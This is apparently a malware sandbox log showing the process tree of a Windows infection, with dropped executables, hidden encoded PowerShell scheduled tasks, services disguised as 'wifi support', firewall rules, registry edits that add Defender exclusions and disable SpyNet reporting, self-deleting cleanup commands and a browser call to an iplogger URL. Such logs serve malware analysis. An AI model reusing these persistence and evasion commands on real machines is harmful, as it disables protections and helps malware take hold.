schtasks /CREATE /TN "gFcRNSSgW" /SC once /ST 18:15:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:1444

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gFcRNSSgW"
6⤵
PID:5600

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gFcRNSSgW"
6⤵
PID:5256

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 22:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\mwzFtpI.exe\" j6 /site_id 525403 /S" /V1 /F
6⤵
- Creates scheduled task(s)
PID:4696

C:\Users\Admin\Documents\peGbkODvxelnwNtmY6eemnEO.exe
"C:\Users\Admin\Documents\peGbkODvxelnwNtmY6eemnEO.exe"
3⤵
- Executes dropped EXE
PID:5704

C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
"C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
4⤵
PID:5564

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:4824

C:\Users\Admin\Documents\3W3Od_ijjAb9QWaB54N_TV_M.exe
"C:\Users\Admin\Documents\3W3Od_ijjAb9QWaB54N_TV_M.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6012

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ucvxwtyk\
4⤵
PID:4588

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
- Executes dropped EXE
PID:6424

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rnpuvbwh.exe" C:\Windows\SysWOW64\ucvxwtyk\
4⤵
- Checks computer location settings
PID:6028

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create ucvxwtyk binPath= "C:\Windows\SysWOW64\ucvxwtyk\rnpuvbwh.exe /d\"C:\Users\Admin\Documents\3W3Od_ijjAb9QWaB54N_TV_M.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:7060

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description ucvxwtyk "wifi internet conection"
4⤵
PID:876

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start ucvxwtyk
4⤵
PID:4584

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:3792

C:\Users\Admin\lxgzpptk.exe
"C:\Users\Admin\lxgzpptk.exe" /d"C:\Users\Admin\Documents\3W3Od_ijjAb9QWaB54N_TV_M.exe"
4⤵
PID:5220

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\qlawqsql.exe" C:\Windows\SysWOW64\emfhgdiu\
5⤵
PID:6788

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config emfhgdiu binPath= "C:\Windows\SysWOW64\emfhgdiu\qlawqsql.exe /d\"C:\Users\Admin\lxgzpptk.exe\""
5⤵
PID:6876

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start emfhgdiu
5⤵
PID:5232

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
5⤵
PID:5988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7714.bat" "
5⤵
PID:3568

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 1272
5⤵
- Program crash
PID:6688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 1164
4⤵
- Program crash
PID:5556

C:\Users\Admin\Documents\9uYvmaeBEH6gvZIhQjN6L0No.exe
"C:\Users\Admin\Documents\9uYvmaeBEH6gvZIhQjN6L0No.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:6032

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:2384

C:\Users\Admin\Documents\Ap3fTbWpa3svPwCMhaadPEoj.exe
"C:\Users\Admin\Documents\Ap3fTbWpa3svPwCMhaadPEoj.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5536

C:\Users\Admin\Documents\nfBfyVfjmy40ULWMDaoroHlH.exe
"C:\Users\Admin\Documents\nfBfyVfjmy40ULWMDaoroHlH.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4468

C:\Users\Admin\Documents\B1rOg1TFBPETnbVrgSEf5iXz.exe
"C:\Users\Admin\Documents\B1rOg1TFBPETnbVrgSEf5iXz.exe"
3⤵
PID:1484

C:\Users\Admin\Documents\a05GkYerDG5V6jVC1ZPpPBkP.exe
"C:\Users\Admin\Documents\a05GkYerDG5V6jVC1ZPpPBkP.exe"
3⤵
PID:1636

C:\Users\Admin\Documents\5DZeDBSmrtFUl9Ym3FAaeeul.exe
"C:\Users\Admin\Documents\5DZeDBSmrtFUl9Ym3FAaeeul.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4832

C:\Users\Admin\Documents\5tYrw2SQyyjGcEN4Kt5_ngzk.exe
"C:\Users\Admin\Documents\5tYrw2SQyyjGcEN4Kt5_ngzk.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3068

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 5tYrw2SQyyjGcEN4Kt5_ngzk.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\5tYrw2SQyyjGcEN4Kt5_ngzk.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:4752

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 5tYrw2SQyyjGcEN4Kt5_ngzk.exe /f
5⤵
- Kills process with taskkill
PID:1084

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:6820

C:\Users\Admin\Documents\vY81tJMq9B74tqVndJfEBQxQ.exe
"C:\Users\Admin\Documents\vY81tJMq9B74tqVndJfEBQxQ.exe"
3⤵
- Executes dropped EXE
PID:5636

C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
4⤵
PID:6516

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
5⤵
- Creates scheduled task(s)
PID:1548

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
- Executes dropped EXE
PID:220

C:\Users\Admin\AppData\Local\Temp\dada.exe
"C:\Users\Admin\AppData\Local\Temp\dada.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1468

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3084

C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3432

C:\Users\Admin\AppData\Local\Temp\Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Installation.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3700

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Installations.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Installations.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2196

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4448

C:\Users\Admin\AppData\Local\Temp\7zS061FCEED\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS061FCEED\setup_install.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c jobiea_8.exe
6⤵
PID:4128

C:\Users\Admin\AppData\Local\Temp\7zS061FCEED\jobiea_8.exe
jobiea_8.exe
7⤵
- Executes dropped EXE
PID:3788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c jobiea_7.exe
6⤵
PID:4844

C:\Users\Admin\AppData\Local\Temp\7zS061FCEED\jobiea_7.exe
jobiea_7.exe
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3424

C:\Users\Admin\AppData\Local\Temp\7zS061FCEED\jobiea_7.exe
C:\Users\Admin\AppData\Local\Temp\7zS061FCEED\jobiea_7.exe
8⤵
- Executes dropped EXE
PID:4640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c jobiea_6.exe
6⤵
PID:4504

C:\Users\Admin\AppData\Local\Temp\7zS061FCEED\jobiea_6.exe
jobiea_6.exe
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:3108

C:\Users\Admin\Documents\kyDnpx9K56qJDlFrxh4BpE9A.exe
"C:\Users\Admin\Documents\kyDnpx9K56qJDlFrxh4BpE9A.exe"
8⤵
- Executes dropped EXE
PID:3900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 620
9⤵
- Program crash
PID:6468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 760
9⤵
- Program crash
PID:2200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 780
9⤵
- Program crash
PID:3704

C:\Users\Admin\Documents\1OKDPJs_l9MDHwDqiC8oNOAj.exe
"C:\Users\Admin\Documents\1OKDPJs_l9MDHwDqiC8oNOAj.exe"
8⤵
- Executes dropped EXE
PID:6152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6152 -s 444
9⤵
- Program crash
PID:812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6152 -s 428
9⤵
- Program crash
PID:5436

C:\Users\Admin\Documents\bkVNMQ9DEuJhwbLyc2Qfdv_v.exe
"C:\Users\Admin\Documents\bkVNMQ9DEuJhwbLyc2Qfdv_v.exe"
8⤵
PID:6432

C:\Users\Admin\AppData\Local\Temp\7zS894D.tmp\Install.exe
.\Install.exe
9⤵
PID:6700

C:\Users\Admin\AppData\Local\Temp\7zSA9E5.tmp\Install.exe
.\Install.exe /S /site_id "525403"
10⤵
PID:4980

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
11⤵
PID:3792

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
12⤵
PID:3184

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
13⤵
PID:4840

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
13⤵
PID:6176

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
11⤵
PID:6116

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
12⤵
PID:6488

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
13⤵
PID:212

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
13⤵
PID:4680

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gneFYMhUw" /SC once /ST 04:32:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
11⤵
- Creates scheduled task(s)
PID:5832

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gneFYMhUw"
11⤵
PID:4392

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gneFYMhUw"
11⤵
PID:7092

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 22:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\hCAewTe.exe\" j6 /site_id 525403 /S" /V1 /F
11⤵
- Creates scheduled task(s)
PID:4288

C:\Users\Admin\Documents\ppSQsan3QP16eGWdznQttzcA.exe
"C:\Users\Admin\Documents\ppSQsan3QP16eGWdznQttzcA.exe"
8⤵
PID:6548

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\emfhgdiu\
9⤵
PID:7040

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hhotzsby.exe" C:\Windows\SysWOW64\emfhgdiu\
9⤵
PID:5364

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create emfhgdiu binPath= "C:\Windows\SysWOW64\emfhgdiu\hhotzsby.exe /d\"C:\Users\Admin\Documents\ppSQsan3QP16eGWdznQttzcA.exe\"" type= own start= auto DisplayName= "wifi support"
9⤵
PID:7012

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description emfhgdiu "wifi internet conection"
9⤵
PID:5104

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start emfhgdiu
9⤵
PID:4532

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
9⤵
PID:6812

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
10⤵
PID:4844

C:\Users\Admin\fratjjne.exe
"C:\Users\Admin\fratjjne.exe" /d"C:\Users\Admin\Documents\ppSQsan3QP16eGWdznQttzcA.exe"
9⤵
PID:4680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\kwfyoosj.exe" C:\Windows\SysWOW64\emfhgdiu\
10⤵
PID:3140

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1636

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config emfhgdiu binPath= "C:\Windows\SysWOW64\emfhgdiu\kwfyoosj.exe /d\"C:\Users\Admin\fratjjne.exe\""
10⤵
PID:4228

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start emfhgdiu
10⤵
PID:6228

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
10⤵
PID:4584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5016.bat" "
10⤵
PID:5524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 1264
10⤵
- Program crash
PID:6648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6548 -s 1160
9⤵
- Program crash
PID:980

C:\Users\Admin\Documents\J5GUcuUX2OMr74ED2sQnIdlg.exe
"C:\Users\Admin\Documents\J5GUcuUX2OMr74ED2sQnIdlg.exe"
8⤵
PID:6452

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
9⤵
PID:6976

C:\Users\Admin\Documents\0S92AZikL5D6ANjBLyLSfkYC.exe
"C:\Users\Admin\Documents\0S92AZikL5D6ANjBLyLSfkYC.exe"
8⤵
PID:6424

C:\Users\Admin\Documents\Wy7XqQpEkd91JKUKZsBPh4Gc.exe
"C:\Users\Admin\Documents\Wy7XqQpEkd91JKUKZsBPh4Gc.exe"
8⤵
PID:6388

C:\Users\Admin\AppData\Local\Temp\087aa001-8896-4b9b-bdb2-5110bbb8643e.exe
"C:\Users\Admin\AppData\Local\Temp\087aa001-8896-4b9b-bdb2-5110bbb8643e.exe"
9⤵
PID:6992

C:\Users\Admin\Documents\PLnP08u9SyqHTeB1eh_bDeaR.exe
"C:\Users\Admin\Documents\PLnP08u9SyqHTeB1eh_bDeaR.exe"
8⤵
- Executes dropped EXE
PID:6324

C:\Users\Admin\Documents\PLnP08u9SyqHTeB1eh_bDeaR.exe
C:\Users\Admin\Documents\PLnP08u9SyqHTeB1eh_bDeaR.exe
9⤵
PID:7068

C:\Users\Admin\Documents\opp2R9ZNSPkmXkDT5Xp1p6i4.exe
"C:\Users\Admin\Documents\opp2R9ZNSPkmXkDT5Xp1p6i4.exe"
8⤵
- Executes dropped EXE
PID:6312

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im opp2R9ZNSPkmXkDT5Xp1p6i4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\opp2R9ZNSPkmXkDT5Xp1p6i4.exe" & del C:\ProgramData\*.dll & exit
9⤵
PID:5476

C:\Windows\SysWOW64\taskkill.exe
taskkill /im opp2R9ZNSPkmXkDT5Xp1p6i4.exe /f
10⤵
- Kills process with taskkill
PID:4032

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
10⤵
- Delays execution with timeout.exe
PID:6180

C:\Users\Admin\Documents\LvuvO4B0XnXvCbMohB4tgU9X.exe
"C:\Users\Admin\Documents\LvuvO4B0XnXvCbMohB4tgU9X.exe"
8⤵
- Executes dropped EXE
PID:5504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5504 -s 600
9⤵
- Program crash
PID:2064

C:\Users\Admin\Documents\q8D6DkBbMl11Y04sW2B1zzBt.exe
"C:\Users\Admin\Documents\q8D6DkBbMl11Y04sW2B1zzBt.exe"
8⤵
- Executes dropped EXE
PID:4616

C:\Users\Admin\Documents\q8D6DkBbMl11Y04sW2B1zzBt.exe
"C:\Users\Admin\Documents\q8D6DkBbMl11Y04sW2B1zzBt.exe"
9⤵
PID:1420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 544
10⤵
- Program crash
PID:4136

C:\Users\Admin\Documents\CgWEgIdrDzNYkDTj8tw9sKU2.exe
"C:\Users\Admin\Documents\CgWEgIdrDzNYkDTj8tw9sKU2.exe"
8⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1580

C:\Users\Admin\Documents\RqwrtQz1RwMfEq3gm4kbp_br.exe
"C:\Users\Admin\Documents\RqwrtQz1RwMfEq3gm4kbp_br.exe"
8⤵
PID:5860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 948
9⤵
- Program crash
PID:6304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 996
9⤵
- Program crash
PID:6956

C:\Users\Admin\Documents\g4Zaj7KeRLrVCt0hOHJt8faM.exe
"C:\Users\Admin\Documents\g4Zaj7KeRLrVCt0hOHJt8faM.exe"
8⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3272

C:\Users\Admin\Documents\wXl1yWok9CHI_U1l8eGGpvn8.exe
"C:\Users\Admin\Documents\wXl1yWok9CHI_U1l8eGGpvn8.exe"
8⤵
- Executes dropped EXE
PID:1268

C:\Users\Admin\Documents\OkF30DvYHWDzcvKcVLtIVd21.exe
"C:\Users\Admin\Documents\OkF30DvYHWDzcvKcVLtIVd21.exe"
8⤵
- Executes dropped EXE
- Checks computer location settings
PID:1628

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
9⤵
PID:7020

C:\Windows\SysWOW64\cmd.exe
cmd
10⤵
PID:6720

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
11⤵
- Enumerates processes with tasklist
PID:6876

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
11⤵
PID:6212

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
11⤵
- Enumerates processes with tasklist
PID:4844

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
11⤵
PID:7060

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
11⤵
- Executes dropped EXE
PID:4328

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Accostarmi.exe.pif
Accostarmi.exe.pif N
11⤵
PID:4000

C:\Users\Admin\Documents\gi0H32RL1wDn3hyGmKY0P4_c.exe
"C:\Users\Admin\Documents\gi0H32RL1wDn3hyGmKY0P4_c.exe"
8⤵
- Executes dropped EXE
PID:2684

C:\Users\Admin\AppData\Local\Temp\dada.exe
"C:\Users\Admin\AppData\Local\Temp\dada.exe"
9⤵
PID:1364

C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
9⤵
PID:6716

C:\Users\Admin\Documents\auTOpCcmRe0eIJg0kVVucw5x.exe
"C:\Users\Admin\Documents\auTOpCcmRe0eIJg0kVVucw5x.exe"
8⤵
- Executes dropped EXE
PID:5500

C:\Users\Admin\Documents\riJfPK8RYtgCepoSeSvSZ92b.exe
"C:\Users\Admin\Documents\riJfPK8RYtgCepoSeSvSZ92b.exe"
8⤵
- Executes dropped EXE
PID:4524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4524 -s 440
9⤵
- Program crash
PID:5472

C:\Users\Admin\Documents\Yt43QJbC7FRoiQ4VkKTLuXfx.exe
"C:\Users\Admin\Documents\Yt43QJbC7FRoiQ4VkKTLuXfx.exe"
8⤵
- Executes dropped EXE
PID:3152

C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
"C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
9⤵
PID:5308

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
9⤵
PID:3336

C:\Users\Admin\Documents\Rv764t34kUQRqKSTvYj_ZG2J.exe
"C:\Users\Admin\Documents\Rv764t34kUQRqKSTvYj_ZG2J.exe"
8⤵
- Executes dropped EXE
PID:1860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c jobiea_5.exe
6⤵
PID:2976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c jobiea_4.exe
6⤵
PID:2960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c jobiea_3.exe
6⤵
PID:2292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c jobiea_2.exe
6⤵
PID:3544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c jobiea_1.exe
6⤵
PID:2172

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1BCik7
3⤵
- Suspicious use of WriteProcessMemory
PID:3116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdc44d46f8,0x7ffdc44d4708,0x7ffdc44d4718
4⤵
PID:680

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,12249050954737697438,14824553566619472032,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 /prefetch:3
4⤵
PID:1764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,12249050954737697438,14824553566619472032,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
4⤵
PID:2016

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:380

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:404

